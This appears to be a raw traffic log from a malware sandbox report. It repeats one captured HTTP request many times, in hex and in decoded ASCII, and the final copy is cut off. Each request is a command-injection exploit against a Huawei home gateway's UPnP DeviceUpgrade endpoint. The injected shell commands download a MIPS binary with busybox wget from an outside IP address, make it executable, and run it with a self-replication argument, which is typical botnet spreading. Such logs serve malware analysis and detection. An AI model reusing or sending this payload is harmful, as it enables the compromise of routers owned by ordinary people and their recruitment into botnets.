                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" 